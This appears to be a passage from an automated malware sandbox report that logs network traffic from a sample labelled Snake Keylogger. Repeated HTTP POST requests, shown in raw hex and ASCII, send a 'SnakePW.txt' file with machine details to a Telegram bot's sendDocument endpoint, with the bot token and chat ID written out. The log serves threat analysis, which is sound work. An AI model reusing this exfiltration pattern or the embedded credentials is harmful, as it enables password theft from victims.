                            Data Ascii: {"ok":true,"result":{"message_id":66847,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.549777149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:41 UTC15OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756d666ed16
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:41 UTC15OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 36 36 65 64 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d666ed16Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:42 UTC16INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:42 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:42 UTC16INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66755,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228762,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            90192.168.2.549937149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:17 UTC152OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eb7a5109
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:17 UTC152OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 37 61 35 31 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eb7a5109Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:17 UTC152INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:17 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:17 UTC153INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66848,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            91192.168.2.549938149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:17 UTC153OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ebbf7543
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:17 UTC154OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 62 66 37 35 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ebbf7543Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:18 UTC154INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:18 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:18 UTC154INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66849,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228797,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            92192.168.2.549939149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:18 UTC155OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ebf3e97a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:18 UTC155OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 62 66 33 65 39 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ebf3e97aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:18 UTC156INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:18 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:18 UTC156INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66850,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228798,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            93192.168.2.549940149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:18 UTC157OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ec31e688
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:18 UTC157OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 33 31 65 36 38 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ec31e688Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:18 UTC157INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:18 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:18 UTC158INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66851,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228798,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            94192.168.2.549941149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:18 UTC158OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ec6d811d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:18 UTC159OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 36 64 38 31 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756ec6d811dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:19 UTC159INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:19 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:19 UTC159INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66852,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            95192.168.2.549942149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:19 UTC160OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756eca456b6
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:19 UTC160OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 63 61 34 35 36 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756eca456b6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:19 UTC161INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:19 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:19 UTC161INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 39 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66853,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228799,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            96192.168.2.549943149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:19 UTC162OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756ece719b2
                            Host: api.telegram.org
                            Content-Length: 504
